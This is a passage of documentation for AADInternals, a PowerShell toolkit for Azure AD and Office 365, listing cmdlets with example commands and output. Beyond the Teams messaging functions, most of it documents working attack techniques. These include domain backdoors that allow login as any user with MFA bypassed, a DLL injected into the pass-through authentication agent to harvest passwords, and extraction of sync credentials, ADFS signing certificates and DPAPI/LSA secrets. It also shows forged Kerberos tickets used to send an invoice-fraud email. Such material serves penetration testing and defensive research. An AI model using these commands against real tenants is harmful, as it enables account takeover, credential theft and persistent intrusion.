# Get Skype token and save to variable
$skypeToken = Get-AADIntSkypeToken

Set-AADIntTeamsAvailability (T)

Since version 0.4,4
Sets the availability status of the user to Available, Busy, DoNotDisturb, BeRightBack, or Away

Example:

# Get access token for teams and save to cache
Get-AADIntAccessTokenForTeams -SaveToCache

# Set Teams availability status to Busy
Set-AADIntTeamsAvailability -Status Busy

Set-AADIntTeamsStatusMessage (T)

Since version 0.4,4
Sets the Teams status message status of the user.

Example:

# Get access token for teams and save to cache
Get-AADIntAccessTokenForTeams -SaveToCache

# Set Teams status message
Set-AADIntTeamsStatusMessage -Message "Out of office til noon"

Search-AADIntTeamsUser (TO)

Since version 0.4,4
Searhes users with the given searchstring.

Example:

# Get access token for teams (to outlook) and save to cache
Get-AADIntAccessTokenForTeams -Resource https://outlook.com -SaveToCache

# Search for users
Search-AADIntTeamsUser -SearchString "user" | Format-Table UserPrincipalName,DisplayName

Output:

UserPrincipalName       DisplayName
-----------------       -----------
first.user@company.com  First User 
second.user@company.com Second User

Send-AADIntTeamsMessage (T)

Since version 0.4,4
Sends a Teams message to given recipients.

Example:

# Get access token for teams and save to cache
Get-AADIntAccessTokenForTeams -SaveToCache

# Send Teams message
Send-AADIntTeamsMessage -Recipients user@company.com -Message "Hi user!"

Output:

Sent                MessageID         
----                ---------         
16/10/2020 14.40.23 132473328207053858

Get-AADIntTeamsMessages (T)

Since version 0.4,4
Gets user’s latest Teams messages.

Example:

# Get access token for teams and save to cache
Get-AADIntAccessTokenForTeams -SaveToCache

# Get Teams messages
Get-AADIntTeamsMessages | Format-Table id,content,deletiontime,*type*,DisplayName

Output:

Id            Content                         DeletionTime  MessageType   Type          DisplayName 
--            -------                         ------------  -----------   ----          ----------- 
1602842299338                                 1602846853687 RichText/Html MessageUpdate Bad User
1602844861358                                 1602858789696 RichText/Html MessageUpdate Bad User
1602846167606                                 1602858792943 Text          MessageUpdate Bad User
1602846853687                                 1602858795517 Text          MessageUpdate Bad User
1602833251951                                 1602833251951 Text          MessageUpdate Bad User
1602833198442                                 1602833198442 Text          MessageUpdate Bad User
1602859223294 Hola User!                                    Text          NewMessage    Bad User
1602859423019 Hi User!                                      Text          NewMessage    Bad User
1602859423019 Hi User!                                      Text          MessageUpdate Bad User
1602859473083 <div><div>Hi User!</div></div>                RichText/Html NewMessage    Bad User
1602859484420 Hey User!                                     Text          NewMessage    Bad User
1602859528028 Hy User!                                      Text          NewMessage    Bad User
1602859484420 Hey User!                                     Text          MessageUpdate Bad User
1602859590916 Hi User!                                      Text          NewMessage    Bad User

Remove-AADIntTeamsMessages (T)

Since version 0.4,4
Deletes given Teams messages.

Example:

# Get access token for teams and save to cache
Get-AADIntAccessTokenForTeams -SaveToCache

# Get Teams messages
Get-AADIntTeamsMessages | Format-Table id,content,deletiontime,*type*,DisplayName

Id            Content                         DeletionTime  MessageType   Type          DisplayName 
--            -------                         ------------  -----------   ----          ----------- 
1602842299338                                 1602846853687 RichText/Html MessageUpdate Bad User
1602844861358                                 1602858789696 RichText/Html MessageUpdate Bad User
1602846167606                                 1602858792943 Text          MessageUpdate Bad User
1602846853687                                 1602858795517 Text          MessageUpdate Bad User
1602833251951                                 1602833251951 Text          MessageUpdate Bad User
1602833198442                                 1602833198442 Text          MessageUpdate Bad User
1602859223294 Hola User!                                    Text          NewMessage    Bad User
1602859423019 Hi User!                                      Text          NewMessage    Bad User
1602859423019 Hi User!                                      Text          MessageUpdate Bad User
1602859473083 <div><div>Hi User!</div></div>                RichText/Html NewMessage    Bad User
1602859484420 Hey User!                                     Text          NewMessage    Bad User
1602859528028 Hy User!                                      Text          NewMessage    Bad User
1602859484420 Hey User!                                     Text          MessageUpdate Bad User
1602859590916 Hi User!                                      Text          NewMessage    Bad User
# Delete Teams messages
Remove-AADIntTeamsMessages -MessageIDs 1602859590916,1602859484420

Hack functions: Identity Federation

Set-AADIntDomainAuthentication (A)

Sets authentication method of the domain. Same functionality than Set-MsolDomainAuthentication cmdlet.

Example:

# Set authentication method to managed
Set-AADIntDomainAuthentication -DomainName company.com -Authentication Managed

ConvertTo-AADIntBackdoor (A)

This function converts the given domain to “backdoor”, which can be used to login to the tenant as any user. See Open-AADIntOffice365Portal to use the backdoor.

This exploits a vulnerability I discovered in late 2017. Technically, domain authentication type is set to Federated and configured to trust to the specific certificate (any.sts) and issuer. You can get a free domain from www.myo365.site.

Edit May 9th 2019: In late 2018 I discovered that also unverified domains can be used as a backdoor. Microsoft has not responded to emails regarding this “feature”.

Example:

# Convert the domain to backdoor
ConvertTo-AADIntBackdoor -DomainName company.myo365.site

Output:

IssuerUri               Domain              
---------               ------              
http://any.sts/B231A11F company.myo365.site

New-AADIntBackdoor (A)

Since version 0.1.6
This function creates a “backdoor” for the given domain name, which can be used to login to the tenant as any user. See Open-AADIntOffice365Portal to use the backdoor.

This exploits a vulnerability I discovered in late 2018 which allows setting the authentication method also for the unverified domains. Microsoft has not responded to emails regarding this “feature”. NOTE! Microsoft has fixed this during the spring 2020.

Example:

# Create a new backdoor
New-AADIntBackdoor -DomainName microsoft.com

Output:

Are you sure to create backdoor with microsoft.com? Type YES to continue or CTRL+C to abort: yes

Authentication     : Managed
Capabilities       : None
IsDefault          : false
IsInitial          : false
Name               : microsoft.com
RootDomain         : 
Status             : Unverified
VerificationMethod : 

IssuerUri               Domain              
---------               ------              
http://any.sts/B231A11F company.myo365.site

Open-AADIntOffice365Portal (*)

This function creates a fake (but valid) WS-Fed/SAML authentication token in .html file and opens it in Internet Explorer in private mode. Use any ImmutableId from any user from your tenant and the issuer “http://any.sts/B231A11F" you created with ConvertTo-AADIntBackdoor.

Internet Explorer should log in automatically unless security settings doesn’t allow that. If that happens, just click Allow blocked content or the button Login to Office 365 and you’re done! From there, you can also browse to https://portal.azure.com as the same user you just logged in.

Example:

# Login as anyone
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA $true

Output: (security alert) aadint

Hack functions: Pass-through authentication (PTA)

Set-AADIntPassThroughAuthentication (P)

This function enables or disabled pass through authentication (PTA).

Example:

# Prompt for credentials and store the token
$pt=Get-AADIntAccessTokenForPTA -Credentials (Get-Credential)
# Disable PTA
Set-AADIntPassThroughAuthentication -AccessToken $pt -Enable $false

Output:

IsSuccesful Enable Exists
----------- ------ ------
true        false  true 

Install-AADIntPTASpy (*)

Since version 0.2.0
Installs PTASpy to the pass-thru authentication agent on the current computer. Must be run as Local Admin on the computer having Azure AD Authentication Agent installed and running (AzureADConnectAuthenticationAgentService.exe).

A hidden folder is created (C:\PTASPy) and PTASpy.dll is copied there. PTASpy.dll is then injected to the running AzureADConnectAuthenticationAgentService. When installed, PTASpy collects all used credentials and stores them to C:\PTASpy\PTASpy.csv with Base64 encoded passwords. PTASpy accepts all passwords so it can be used as a backdoor.

Use Get-AADIntPTASpyLog to read the log.

Example:

# Install PTASpy
Install-AADIntPTASpy

Output:

Are you sure you wan't to install PTASpy to this computer? Type YES to continue or CTRL+C to abort: yes
Installation successfully completed!
All passwords are now accepted and credentials collected to C:\PTASpy\PTASpy.csv

Get-AADIntPTASpyLog (*)

Since version 0.2.0
Lists the credentials from C:\PTASpy\PTASPy.csv collected by PTASpy

Example 1:

# Show the PTASpy log
Get-AADIntPTASpyLog

Output:

UserName         Password                     Time                
--------         --------                     ----                
user@company.com TQB5AFAAYQBzAHMAdwBvAHIAZAA= 5/22/2019 9:51:43 AM
user@company.com bQBZAHAAQQBTAFMAVwBPAFIARAA= 5/22/2019 9:52:07 AM

Example 2:

# Show the PTASpy log with decoded passwords
Get-AADIntPTASpyLog -DecodePasswords

Output:

UserName         Password   Time                
--------         --------   ----                
user@company.com MyPassword 5/22/2019 9:51:43 AM
user@company.com mYpASSWORD 5/22/2019 9:52:07 AM

Remove-AADIntPTASpy (*)

Since version 0.2.0
Restarts Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent) service and removes PTASpy.

Example:

# Remove PTASpy
Remove-AADIntPTASpy

Output:

WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
WARNING: Waiting for service 'Microsoft Azure AD Connect Authentication Agent (AzureADConnectAuthenticationAgent)' to stop...
Service restarted and C:\PTASpy\PTASpy.dll removed.

Register-AADIntPTAAgent (P)

Since version 0.2.8
Registers a PTA agent to Azure AD with given machine name and creates a client certificate. After the registration, the certificate and name can be used with Microsoft AzureAD Connect / PTA agent (Set-AADIntPTACertificate) or with Invoke-AADIntPTAAgent

Example 1:

# Register a PTA Agent
Register-AADIntPTAAgent -MachineName "server1.company.com"

Output:

PTA Agent (005b136f-db3e-4b54-9d8b-8994f7717de6) registered as server1.company.com
Certificate saved to PTA_client_certificate.pfx

Example 2:

# Register a PTA Agent
pt=Get-AADIntAccessTokenForPTA
Register-AADIntPTAAgent -AccessToken $pt -MachineName "server1.company.com" -FileName server1.pfx

Output:

PTA Agent (005b136f-db3e-4b54-9d8b-8994f7717de6) registered as server1.company.com
Certificate saved to server1.pfx

Register-AADIntSyncAgent (P)

Since version 0.2.9
Registers a sync agent to Azure AD with given machine name and creates a client certificate. After the registration, the certificate and name can be used with Azure AD Connect cloud provisioning agent.

Example 1:

# Register a Sync Agent
Register-AADIntSyncAgent -MachineName "server1.company.com"

Output:

Sync agent registered as server1.company.com
Certificate saved to PTA_client_certificate.pfx

Example 2:

# Register a Sync Agent
pt=Get-AADIntAccessTokenForPTA
Register-AADIntSyncAgent -AccessToken $pt -MachineName "server1.company.com" -FileName server1.pfx

Output:

Sync agent registered as server1.company.com
Certificate saved to server1.pfx

Set-AADIntPTACertificate (*)

Since version 0.2.8
Sets the certificate used by Azure AD Authentication Agent. Can be used to change the name and target tenant of the PTA Agent. It changes InstanceID and TenantID registry values at “HKLM:\SOFTWARE\Microsoft\Azure AD Connect Agents\Azure AD Connect Authentication Agent”, and the certificate thumbprint at “$env:ProgramData\Microsoft\Azure AD Connect Authentication Agent\Config\TrustSettings.xml”. It also imports the certificate to “Cert:\LocalMachine\My” and gives the “Network Service” read access to it’s private key. Together with PTASpy allows using a standalone server as a backdoor.

Note! After restarting the service, the PTA Agent might be unable to decrypt password requests. To get the decryption to work, you MUST manually give read access for “Network Service” to the private certificate at “C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\“. Use the SysInternals Process Monitor to see which file gets ACCESS DENIED error.

Example 1:

# Change the PTA certificate
Set-AADIntPTACertificate -PfxFileName server1.pfx -PfxPassword "password"

Output:

Certification information set, remember to restart the service.

Example 2:

# Register a PTA agent
$pt=Get-AADIntAccessTokenForPTA
Register-AADIntPTAAgent -MachineName "server1.company.com" -AccessToken $pt

Output:

PTA agent registered as server1.company.com
Certificate saved to PTA_client_certificate.pfx
# Change the PTA certificate
Set-AADIntPTACertificate

Output:

Certification information set, remember to restart the service.

Invoke-AADIntPTAAgent (*)

Since version 0.2.8
Invokes PTA Agent with given name and certificate, and connect to Azure AD. Emulates Azure AD Authentication Agent by accepting any password and dumping them to console.

Note! This is AN EXPERIMENTAL version likely to crash! PowerShell implementation was too slow, so had to code this in C#

Example 1:

# Invoke the PTA Agent
Invoke-AADIntPTAAgent -MachineName "server1.company.com" -FileName server1.pfx

Output:

Connector 1 connecting to his-eur1-neur1
Connector 2 connecting to his-eur1-neur1
Connector 3 connecting to his-eur1-weur1
Connector 4 connecting to his-eur1-weur1

PTAAgent started, waiting for logins..

Example 2:

# Register a PTA agent
$pt=Get-AADIntAccessTokenForPTA
Register-AADIntPTAAgent -AccessToken $pt -MachineName "server1.company.com"

Output:

PTA agent registered as server1.company.com
Certificate saved to PTA_client_certificate.pfx
# Invoke the PTA Agent
Invoke-AADIntPTAAgent -MachineName "server1.company.com"

Output:

Connector 1 connecting to his-eur1-neur1
Connector 2 connecting to his-eur1-neur1
Connector 3 connecting to his-eur1-weur1
Connector 4 connecting to his-eur1-weur1

PTAAgent started, waiting for logins..

Get-AADIntProxyAgents (P)

Since version 0.2.9
This function shows the list of MS App Proxy authentication (PTA) and provisioning (Azure AD Connect cloud provisioning) agents.

Example:

# Get the access token
$pt=Get-AADIntAccessTokenForPTA

# List the proxy agents
Get-AADIntProxyAgents -AccessToken $pt | ft

Output:

id                                   machineName         externalIp     status   supportedPublishingTypes
--                                   -----------         ----------     ------   ------------------------
51f3afd9-685b-413a-aafa-bab0d556ea4b this.is.a.fake      67.35.155.73   active   {authentication}        
51a061a0-968d-48b8-951e-5ae9d9a0441f server1.company.com 93.188.31.116  inactive {authentication}        
49c9ad46-c067-42f6-a678-dfd938c27789 server2.company.com 102.20.104.213 inactive {provisioning} 

Get-AADIntProxyAgentGroups (P)

Since version 0.2.9
This function shows the list of MS App Proxy authentication groups of (PTA) and provisioning (Azure AD Connect cloud provisioning) agents.

Example:

# Get the access token
$pt=Get-AADIntAccessTokenForPTA

# List the proxy agents
Get-AADIntProxyAgentGroups -AccessToken $pt | ft

Output:

TenantId                    : ea664074-37dd-4797-a676-b0cf6fdafcd4
ConfigurationDisplayName    : company.com
ConfigurationResourceName   : company.com
ConfigurationPublishingType : provisioning
id                          : 4b6ffe82-bfe2-4357-814c-09da95399da7
displayName                 : Group-company.com-42660f4a-9e66-4a08-ac17-2a2e0d8b993e
publishingType              : provisioning
isDefault                   : False

Hack functions: Directory Synchronization

Set-AADIntPasswordHashSyncEnabled (A)

Since version 0.1.6
This function enables or disabled password hash synchronization (PHS).

This can be used to turn on PHS so that passwords can be set using Set-AADIntUserPassword.

Example:

# Enable PHS
Set-AADIntPasswordHashSyncEnabled -Enable $true

New-AADIntGuestInvitation (Z)

This function invites a guest user to tenant. Does not require admin rights, as long as access to Azure Portal is allowed. Basically, this function allows every member of the tenant to invite guest users to the tenant.

Example:

# Get the auth token. Supports also external users (outlook.com, etc.)
$zt=Get-AADIntAuthTokenForAADIAMAPI -Credentials (Get-Credential)
# Get login information for a domain
New-AADIntGuestInvitation -AuthToken $zt -EmailAddress someone@outlook.com -Message "Welcome to our tenant!"

Output:

accountEnabled                        : True
usageLocation                         : 
mailNickname                          : someone_outlook.com#EXT#
passwordProfile                       : 
rolesEntity                           : 
selectedGroupIds                      : 
streetAddress                         : 
city                                  : 
state                                 : 
country                               : 
telephoneNumber                       : 
mobile                                : 
physicalDeliveryOfficeName            : 
postalCode                            : 
authenticationPhoneNumber             : 
authenticationAlternativePhoneNumber  : 
authenticationEmail                   : 
strongAuthenticationDetail            : @{verificationDetail=}
defaultImageUrl                       : 
ageGroup                              : 
consentProvidedForMinor               : 
legalAgeGroupClassification           : 
objectId                              : e250c8f5-3ff3-4eea-9d68-cff019fa850e
objectType                            : User
displayName                           : someone
userPrincipalName                     : someone_outlook.com#EXT#@company.onmicrosoft.com
thumbnailPhoto@odata.mediaContentType : 
givenName                             : 
surname                               : 
mail                                  : someone@outlook.com
dirSyncEnabled                        : 
alternativeSecurityIds                : {}
signInNamesInfo                       : {}
signInNames                           : {someone_outlook.com#EXT#@company.onmicrosoft.com}
ownedDevices                          : 
jobTitle                              : 
department                            : 
displayUserPrincipalName              : 
hasThumbnail                          : False
imageUrl                              : 
imageDataToUpload                     : 
source                                : 
sources                               : 
sourceText                            : 
userFlags                             : 
deletionTimestamp                     : 
permanentDeletionTime                 : 
alternateEmailAddress                 : 
manager                               : 
userType                              : Guest
isThumbnailUpdated                    : 
isAuthenticationContactInfoUpdated    : 
searchableDeviceKey                   : {}
displayEmail                          : 
creationType                          : Invitation
userState                             : PendingAcceptance
otherMails                            : {someone@outlook.com}

Get-AADIntSyncCredentials (*)

Since version 0.1.8
This function extracts Azure AD Connect credentials to AD and Azure AD from WID database. Note: This function “elevates” the session to ADSync user. You MUST restart PowerShell to restore original rights.

Example:

# Get Azure AD Connect credentials
Get-AADIntSyncCredentials

Output:

Name                           Value
----                           -----
ADDomain                       company.com  
ADUser                         MSOL_4bc4a34e95fa
ADUserPassword                 Q9@p(poz{#:kF_G)(s/Iy@8c*9(t;...
AADUser                        Sync_SRV01_4bc4a34e95fa@company.onmicrosoft.com                                                   
AADUserPassword                $.1%(lxZ&/kNZz[r

Update-AADIntSyncCredentials (*)

Since version 0.1.8
This function resets Azure AD Connect credentials to Azure AD and stores it to Azure AD Connect configuration database. Note: This function “elevates” the session to ADSync user. You MUST restart PowerShell to restore original rights.

Example:

# Get the current Azure AD Connect credentials
Get-AADIntSyncCredentials
# Save credentials to a variable
$Cred = Get-Credential -Message "O365" -UserName "Sync_SRV01_4bc4a34e95fa@company.onmicrosoft.com"

# Get Access Token
$Token=Get-AADIntAccessTokenForAADGraph -Credentials $Cred

# Update Azure AD Connect credentials for Azure AD
Update-AADIntSyncCredentials -AccessToken $Token

Output:

Password successfully updated to Azure AD and configuration database!

Name                           Value
----                           -----
ADDomain                       company.com  
ADUser                         MSOL_4bc4a34e95fa
ADUserPassword                 Q9@p(poz{#:kF_G)(s/Iy@8c*9(t;...
AADUser                        Sync_SRV01_4bc4a34e95fa@company.onmicrosoft.com                                                   
AADUserPassword                Y%C(]u%Rq;en-P;^

Remember to restart the sync service: Restart-Service ADSync

Get-AADIntSyncEncryptionKeyInfo (*)

Since version 0.3.0
This function extracts Entropy and InstanceID from the local ADSync configuration database. Returned information can be used with Get-AADIntSyncEncryptionKey.

Example:

# Get the ADSync encryption key info
Get-AADIntSyncEncryptionKeyInfo

Output:

Name                           Value                                                                                                                                            
----                           -----                                                                                                                                            
InstanceId                     299b1d83-9dc6-479a-92f1-2357fc5abfed                                                                                                             
Entropy                        a1c80460-6fe9-4c6f-bf31-d7a34c878dca

Get-AADIntSyncEncryptionKey (*)

Since version 0.3.0
Gets ADSync encryption key using the given entropy and instance id. These can be read from the database or using Get-AADIntSyncEncryptionKeyInfo.

Example:

# Get the key information
$key_info = Get-AADIntSyncEncryptionKeyInfo

# Get the ADSync encryption key 
Get-AADIntSyncEncryptionKey -Entropy $key_info.Entropy -InstanceId $key_info.InstanceId

Output:

Id     Guid                                 CryptAlg Key                   
--     ----                                 -------- ---                   
100000 299b1d83-9dc6-479a-92f1-2357fc5abfed    26128 {4, 220, 54, 13...}

Hack functions: ADFS

New-AADIntADFSSelfSignedCertificates (*)

Since version 0.2.3
Disables certificate auto rollover and creates new self-signed Token Signing and Token Decrypt certificates for ADFSService. The created certificates are copies of existing certificates, except that they are valid for 10 years. Certificates are added to ADFS and the service is restarted. Certificates are also exported to the current directory.

Default password for exported .pfx files is “AADInternals”

Note! If there are multiple ADFS servers, certificates MUST be imported to each server’s Local Machine Personal store and read access to private keys for the ADFS service accounts must be assigned. Also, the ADFS service needs to be restarted.

Don’t forget to update certificate information to Azure AD using Update-AADIntADFSFederationSettings

Example:

# Create new certificates
New-AADIntADFSSelfSignedCertificates

Restore-AADIntADFSAutoRollover (*)

Since version 0.2.3
Restores ADFS to “normal” mode: Token Signing and Token Decryption certificates are automatically rolled over once a year. Enables certificate auto rollover, updates Token Signing and Token Decryption certificates and removes the old self-signed certificates.

Note! If there are multiple ADFS servers the ADFS service needs to be restarted on each server.

Don’t forget to update certificate information to Azure AD using Update-AADIntADFSFederationSettings

Example:

# Restore the auto rollover mode
Restore-AADIntADFSAutoRollover

Update-AADIntADFSFederationSettings (A)

Since version 0.2.3
Updates federation information of the given domain to match the local ADFS server information.

Example:

# Update federation setting for domain company.com
Update-AADIntADFSFederationSettings -Domain company.com

Export-AADIntADFSSigningCertificate (*)

Since version 0.2.5
This function exports the ADFS token signing certificate. Must be run on ADFS server as domain admin or ADFS service account.

The certificate can be used to create valid SAML tokens to login in as any user of the tenant.

Example:

# Export ADFS token signing certificate
Export-AADIntADFSSigningCertificate -filename ADFSSigningCertificate.pfx

Export-AADIntADFSEncryptionCertificate (*)

Since version 0.2.5
This function exports the ADFS token encryption certificate. Must be run on ADFS server as domain admin or ADFS service account.

The certificate can be used to encrypt SAML tokens.

Example:

# Export ADFS token encryption certificate
Export-AADIntADFSEncryptionCertificate -filename ADFSEncryptionCertificate.pfx

Hack functions: Seamless Single-sign-on (DesktopSSO)

Get-AADIntDesktopSSO (P)

Since version 0.2.6
Shows the Desktop SSO (a.k.a. Seamless SSO) status of the tenant.

Example:

# Create an access token for PTA
$pt=Get-AADIntAccessTokenForPTA

# Show the DesktopSSO status
Get-AADIntDesktopSSO -AccessToken $pt

Output:

Domains      : 
Enabled      : False
ErrorMessage : 
Exists       : True
IsSuccessful : True

Set-AADIntDesktopSSOEnabled (P)

Since version 0.2.6
Enables or disables DesktopSSO.

Example:

# Create an access token for PTA
$pt=Get-AADIntAccessTokenForPTA

# Enable the DesktopSSO
Set-AADIntDesktopSSOEnabled -AccessToken $pt -Enable $true

Output:

IsSuccessful ErrorMessage
------------ ------------
        True

# Show the DesktopSSO status
Get-AADIntDesktopSSO -AccessToken $pt
Output:

Domains      : 
Enabled      : True
ErrorMessage : 
Exists       : True
IsSuccessful : True

Set-AADIntDesktopSSOEnabled (P)

Since version 0.2.6
Sets DesktopSSO information for the given domain. In other words, you can create a backdoor! It can also be used to change the password of the existing DesktopSSO configuration to AzureAD and to reset the password of the computer account used for SSO (default is AZUREADSSOACC).

Example:

# Create an access token for PTA
$pt=Get-AADIntAccessTokenForPTA

# Enable the DesktopSSO for the given domain
Set-AADIntDesktopSSO -AccessToken $pt -DomainName company.com -Password "mypassword" -Enable $true

Output:

IsSuccessful ErrorMessage
------------ ------------
        True

# Show the DesktopSSO status
Get-AADIntDesktopSSO -AccessToken $pt
Output:

Domains      : company.com
Enabled      : True
ErrorMessage : 
Exists       : True
IsSuccessful : True

New-AADIntKerberosTicket

Since version 0.2.6
This function creates a Kerberos ticket with given user details and server (usually AZUREADSSOACC) password. Uses only user’s SID and server password.

User SID can be given as a SID object, SID string, or UserPrincipalNane (UPN). If UPN is given, SID is searched from AD or AAD. For AD, the user running the command need to have read access to AD. For AAD, an access token for Azure AD Graph needs to be given.

Note! The Kerberos ticket is valid only for a couple of minutes!

Example:

# Create a Kerberos ticket
$kt=New-AADIntKerberosTicket -ADUserPrincipalName user@company.com -Password "mypassword"

# Get an access token for Exchange Online
$et=Get-AADIntAccessTokenForEXO -KerberosTicket $kt -Domain company.com

# Send an email using Outlook API
Send-AADIntOutlookMessage -AccessToken $et -Recipient "accounting@company.com" -Subject "Invoice" -Message "Pay the attached invoice <b>ASAP!</b>"

Hack functions: Active Directory

Get-AADIntDPAPIKeys (*)

Since version 0.3.0
Gets DPAPI system keys which can be used to decrypt secrets of all users encrypted with DPAPI. MUST be run on a domain controller as an administrator.

Example:

# Get DPAPI keys
Get-AADIntDPAPIKeys

Output:

UserKey               UserKeyHex                               MachineKey            MachineKeyHex                           
-------               ----------                               ----------            -------------                           
{16, 130, 39, 122...} 1082277ac85a532018930b782c30b7f2f91f7677 {226, 88, 102, 95...} e258665f0a016a7c215ceaf29ee1ae17b9f017b9

Get-AADIntLSASecrets (*)

Since version 0.3.0
Gets computer’s Local Security Authority (LSA) secrets. MUST be run as an administrator.

Example:

# Get LSA secrets
Get-AADIntLSASecrets

Output:

Name        : $MACHINE.ACC
Password    : {1, 2, 3, 4...}
PasswordHex : 01020304..
PasswordTxt : 컓噖덭а劈-⌋결
MD4         : {1, 2, 3, 4...}
SHA1        : {1, 2, 3, 4...}
MD4Txt      : aabbccdd..
SHA1Txt     : aabbccdd..

Name        : DPAPI_SYSTEM
Password    : {1, 0, 0, 0...}
PasswordHex : 0100000001082277ac85a532018930b782c30b7f2f91f7677e258665f0a016a7c215ceaf29ee1ae17b9f017b9
PasswordTxt : 결挌榵
MD4         : {1, 2, 3, 4...}
SHA1        : {1, 2, 3, 4...}
MD4Txt      : aabbccdd..
SHA1Txt     : aabbccdd..

Name        : NL$KM
Password    : {1, 2, 3, 4...}
PasswordHex : 01020304..
PasswordTxt : ⬡ꎛ
MD4         : {1, 2, 3, 4...}
SHA1        : {1, 2, 3, 4...}
MD4Txt      : aabbccdd..
SHA1Txt     : aabbccdd..

Name        : _SC_ADSync
Password    : {1, 2, 3, 4...}
PasswordHex : 01020304..
PasswordTxt : a5bTiGcvC8fr=E;MQ331IOt/&RP,!m:qjiRXaS;xr4V#6t74;&7mXWoOoz"57K/kKTz#xdBBqb.GDKly
MD4         : {1, 2, 3, 4...}
SHA1        : {1, 2, 3, 4...}
MD4Txt      : aabbccdd..
SHA1Txt     : aabbccdd..

Get-AADIntLSABackupKeys (*)

Since version 0.3.0
Gets Local Security Authority (LSA) backup keys which can be used to decrypt secrets of all users encrypted with DPAPI. MUST be run as an administrator.

Example:

# Get LSA backup keys
Get-AADIntLSABackupKeys

Output:

certificate     Name   Id                                   Key                   
-----------     ----   --                                   ---                   
{1, 2, 3, 4...} RSA    e783c740-2284-4bd6-a121-7cc0d39a5077 {231, 131, 199, 64...}
                Legacy ff127a05-51b1-4d45-8655-30c883631d90 {255, 18, 122, 5...}

Get-AADIntSystemMasterKeys (*)

Since version 0.3.0
Gets local system master keys with the given system backup key (LSA backup key).

Example:

# Get the LSA backup keys
$lsabk_keys=Get-AADIntLSABackupKeys

# Save the private key to a variable
$rsa_key=$lsabk_keys | where name -eq RSA

# Get system master keys
Get-AADIntSystemMasterkeys -SystemKey $rsa_key.key

Output:

Name                           Value
----                           -----
ec3c7e8e-fb06-43ad-b382-8c5... {236, 60, 126, 142...}

Example:

# Get the LSA backup keys
$lsabk_keys=Get-AADIntLSABackupKeys

# Save the private key to a variable
$rsa_key=$lsabk_keys | where name -eq RSA

# Get user's master keys
Get-AADIntUserMasterkeys -UserName "myuser" -SID "S-1-5-xxxx" -SystemKey $rsa_key.key

Output:

Name                           Value
----                           -----
ec3c7e8e-fb06-43ad-b382-8c5... {236, 60, 126, 142...}
8a26d304-198c-4495-918f-77b...

Get-AADIntUserMasterKeys (*)

Since version 0.3.0
Gets user’s master keys using the password or system backup key (LSA backup key).

Example:

# Get user's master keys with username and password
Get-AADIntUserMasterkeys -UserName "myuser" -SID "S-1-5-xxxx" -Password "password"

Output:

Name                           Value
----                           -----
ec3c7e8e-fb06-43ad-b382-8c5... {236, 60, 126, 142...}
8a26d304-198c-4495-918f-77b... {166, 95, 5, 216...}

Example:

# Get user's master keys using LSA backup key
# Get the LSA backup keys
$lsabk_keys=Get-AADIntLSABackupKeys

# Save the private key to a variable
$rsa_key=$lsabk_keys | where name -eq RSA

# Get user's master keys
Get-AADIntUserMasterkeys -UserName "myuser" -SID "S-1-5-xxxx" -SystemKey $rsa_key.key

Output:

Name                           Value
----                           -----
ec3c7e8e-fb06-43ad-b382-8c5... {236, 60, 126, 142...}
8a26d304-198c-4495-918f-77b...

Get-AADIntLocalUserCredentials (*)

Since version 0.3.0
Gets user’s credentials from the local credential vault. Note: Currently supports only SHA1 hashing and 3DES encryption algorithms, so probably fails for “normal” users.

Example:

# Get the LSA backup keys
$lsabk_keys=Get-AADIntLSABackupKeys

# Save the private key to a variable
$rsa_key=$lsabk_keys | where name -eq RSA

# Get user's master keys
$user_masterkeys=Get-AADIntUserMasterkeys -UserName "myuser" -SID "S-1-5-xxxx" -SystemKey $rsa_key.key

# List user's credentials
Get-AADIntLocalUserCredentials -UserName "myuser" -MasterKeys $user_masterkeys

Output:

Target        : LegacyGeneric:target=msTeams_autologon.microsoftazuread-sso.com:443/user@company.com
Persistance   : local_machine
Edited        : 26/03/2020 10.12.11
Alias         : 
Comment       : 
UserName      : 
Secret        : {97, 115, 100, 102...}
SecretTxt     : 獡晤晤
SecretTxtUtf8 : asdfdf
Attributes    : {}

Hack functions: Azure AD join, MDM & PRT

Get-AADIntUserPRTToken (*)

Since version 0.4.1
Gets user’s PRT token from the Azure AD joined or Hybrid joined computer. Uses BrowserCore.exe to get the PRT token.

Example:

# Get the PRToken
$prtToken = Get-AADIntUserPRTToken

# Get an access token for AAD Graph API and save to cache
Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken

Join-AADIntDeviceToAzureAD (J)

Since version 0.4.1
Emulates Azure AD Join by registering the given device to Azure AD and generates a corresponding certificate.

You may use any name, type or OS version you like.

The generated certificate can be used to create a Primary Refresh Token and P2P certificates. The certificate has no password.

Example:

# Get an access token for AAD join and save to cache
Get-AADIntAccessTokenForAADJoin -SaveToCache

# Join the device to Azure AD
Join-AADIntDeviceToAzureAD -DeviceName "My computer" -DeviceType "Commodore" -OSVersion "C64"
Output:

Device successfully registered to Azure AD:
  DisplayName:     "My computer"
  DeviceId:        d03994c9-24f8-41ba-a156-1805998d6dc7
  Cert thumbprint: 78CC77315A100089CF794EE49670552485DE3689
  Cert file name : "d03994c9-24f8-41ba-a156-1805998d6dc7.pfx"
Local SID:
  S-1-5-32-544
Additional SIDs:
  S-1-12-1-797902961-1250002609-2090226073-616445738
  S-1-12-1-3408697635-1121971140-3092833713-2344201430
  S-1-12-1-2007802275-1256657308-2098244751-2635987013

Get-AADIntUserPRTKeys (*)

Since version 0.4.1
Creates a new set of Primary Refresh Token (PRT) keys for the user, including a session key and a refresh_token (PRT). Keys are saved to a json file.

Example:

# Get an access token for AAD join and save to cache
Get-AADIntAccessTokenForAADJoin -SaveToCache

# Join the device to Azure AD
Join-AADIntDeviceToAzureAD -DeviceName "My computer" -DeviceType "Commodore" -OSVersion "C64"

Device successfully registered to Azure AD:
  DisplayName:     "My computer"
  DeviceId:        d03994c9-24f8-41ba-a156-1805998d6dc7
  Cert thumbprint: 78CC77315A100089CF794EE49670552485DE3689
